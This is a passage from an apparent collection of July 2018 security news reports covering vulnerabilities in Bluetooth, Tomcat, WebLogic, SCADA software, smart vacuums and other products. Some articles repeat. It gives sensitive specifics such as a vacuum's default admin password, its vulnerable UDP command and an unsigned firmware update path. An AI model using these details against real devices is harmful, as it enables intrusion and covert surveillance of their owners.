“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish
bits with a certain confidence” continues the paper.

The expert reported the NewSpectre attack to Intel in March and the tech giant addressed the issue with the first set of security patches it has released.


Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek
Vulnerebility

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.


Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek
Vulnerebility

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.


Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users short one-time verification codes. This, combined with the lack of a limitation mechanism for the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than the ones of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”


Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs
Vulnerebility

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender then it disappeared for a few days, and appeared again a few week later infecting in less than a weeks more than 20,000 devices.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices, recently researchers from Qihoo 360’s NetLab discovered the bot was also targeting AVTECH webcams, Cisco Linksys routers, OrientDB and CouchDB database servers.

Hide â?˜N Seek timeline

Fortinet experts have compared three different versions of the bot across the time.

The security firm reports that the latest version of the bot has a configuration composed up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability, the malicious code allows the botnet to target devices in smart homes controller by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”


CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs
Vulnerebility

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue tracked as CVE-2018-5383 affects the Secure Simple Pairing and LE Secure Connections features, it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then it can monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.” reads the advisory published by the Bluetooth SIG explained.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification, now it is mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted, it also added that security fixes were already provided to OEM customers.


Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs
Vulnerebility

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is the CVE-2018-8037, it is an important bug in the tracking of connection closures that can lead to reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Tomcat 9.0.10 and 8.5.32 releases address the vulnerabilities.

Another important issue addressed by the Foundation is the CVE-2018-1336, it is an improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder triggering a Denial of Service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 addresses the vulnerability.

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .


Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek
Vulnerebility

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.

Comments on Oracle WebLogic security


AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek
Vulnerebility

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.

AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix 81.1.00.08 for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.


Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek
Vulnerebility

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.Critical vulnerability found in Bluetooth

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.


Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek
  Vulnerebility

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.Apache Tomcat vulnerabilities

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity security constraints bypass issue tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .


Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek
Vulnerebility

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Furthermore, Mahmood also discovered that the request also had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged in user and perform actions on their behalf.

An attack scenario, he says, would require for an attacker to know the ProjectID number of a logged in victim. Thus, they could include a URL in a page to issue a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek
Vulnerebility

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.


Microsoft Addresses Serious Vulnerability in Translator Hub
22.7.2018 securityweek
Vulnerebility

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Furthermore, Mahmood also discovered that the request also had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged in user and perform actions on their behalf.

An attack scenario, he says, would require for an attacker to know the ProjectID number of a logged in victim. Thus, they could include a URL in a page to issue a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


Adobe Patches Vulnerability Affecting Internal Systems
22.7.2018 securityweek
Vulnerebility

Adobe has patched what researchers describe as a potentially serious security issue in its internal systems, but the company has downplayed the impact of the vulnerability.

White hat hackers at Germany-based security research firm Vulnerability Lab claim to have discovered that code submitted through some of Adobe’s event marketing registration forms ultimately made its way to one of the company’s main databases, from where it propagated to emails and web services.

Adobe told SecurityWeek that the issue was a cross-site scripting (XSS) bug in a form used for event marketing registration and said a fix had been implemented. If Adobe’s classification of the flaw is accurate, it was likely a persistent XSS.

Vulnerability Lab told SecurityWeek that it analyzed the issue between November 2017 and February 2018, when it reported its findings to the vendor. The company claims it took until May for Adobe to identify the cause of the problem, with a patch being implemented in mid-June.

Following the disclosure, Adobe included Vulnerability Lab on its industry partners page, which also lists CERT/CC, FireEye, Microsoft, Google, Tencent, Qihoo 360, Kaspersky, Palo Alto Networks and others.

The researchers said there were multiple domains where malicious code could have been inserted and there were multiple places where the code would be executed.

“The code was injected to a micro service, from there it was taken to the main application management service. Then it was synced into the main lead database of Adobe and we had several domains where we were able to place our codes with executable content,” explained Benjamin Kunz Mejri, CEO and founder of Vulnerability Lab.

The exploit code was delivered via emails sent out by Adobe and on some of the company’s domains, Kunz Mejri said.

Attack scheme

Vulnerability Lab has published a blog post and an advisory to describe the vulnerability.


Experts disclose dangerous flaws in robotic Dongguan Diqee 360 smart vacuums
22.7.2018 securityaffairs 
Vulnerebility

Positive Technologies discovered two flaws affecting Dongguan Diqee 360 smart vacuums that can be used to perform video surveillance.
Security researchers from Positive Technologies have discovered two vulnerabilities affecting Dongguan Diqee 360 smart vacuum cleaners that could be exploited by an attacker to run malicious code on a device with superuser privileges.

The flaws likely affect smart vacuum cleaners made by the company and sold under other brands as well, experts believe the issue could affect also other Dongguan devices, including DVRs, surveillance cameras, and smart doorbells.

“Like any other IoT device, these robot vacuum cleaners could be marshalled into a botnet for DDoS attacks, but that’s not even the worst-case scenario, at least for owners. Since the vacuum has Wi-Fi, a webcam with night vision, and smartphone-controlled navigation, an attacker could secretly spy on the owner” reads the post published by Positive Technologies.

The two vulnerabilities have been tracked as CVE-2018-10987 and CVE-2018-10988, the former could be exploited by a remote attacker meanwhile the latter needs physical access to the device.

The first bug can only be exploited by an authenticated attacker, but Positive Technologies says all Diqee 360 devices come with a default password of 888888 for the admin account, which very few users change, and which attackers can incorporate into their exploit chain.

smart vacuums

Once an authenticated attacker has discovered the vacuum on the network by obtaining its MAC address it will send a specially crafted UDP packet, and execute commands on the
vacuum cleaner as root. The bug resided in the function REQUEST_SET_WIFIPASSWD (UDP command 153).
” An attacker can discover the vacuum on the network by obtaining its MAC address and send a UDP request, which, if crafted in a specific way, results in execution of a command with superuser rights on the vacuum.” reads the report published by the experts.

“The vulnerability resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153). To succeed, the attacker must authenticate on the device—which is made easier by the fact that many affected devices have the default username and password combination (admin:888888).”

The second vulnerability requires physical access to be triggered, it can be exploited by an attacker to load a tainted version of the firmware by inserting a microSD card into the vacuum.

“A microSD card could be used to exploit weaknesses in the vacuum’s update mechanism. After the card is inserted, the vacuum update system runs firmware files from the upgrade_360 folder with superuser rights, without any digital signature check. Therefore, a hacker could create a special script, place it on a microSD card in the upgrade_360 folder, insert this card, and restart the vacuum. This script could run arbitrary code, such as a sniffer to intercept private data sent over Wi-Fi by other devices.” states the post.

Positive Technologies responsibly reported the flaws in the smart vacuums to the company giving it the time to address the vulnerabilities, unfortunately, it does not have any information about whether or not the vulnerabilities have been fixed to date


Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs
Vulnerebility

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

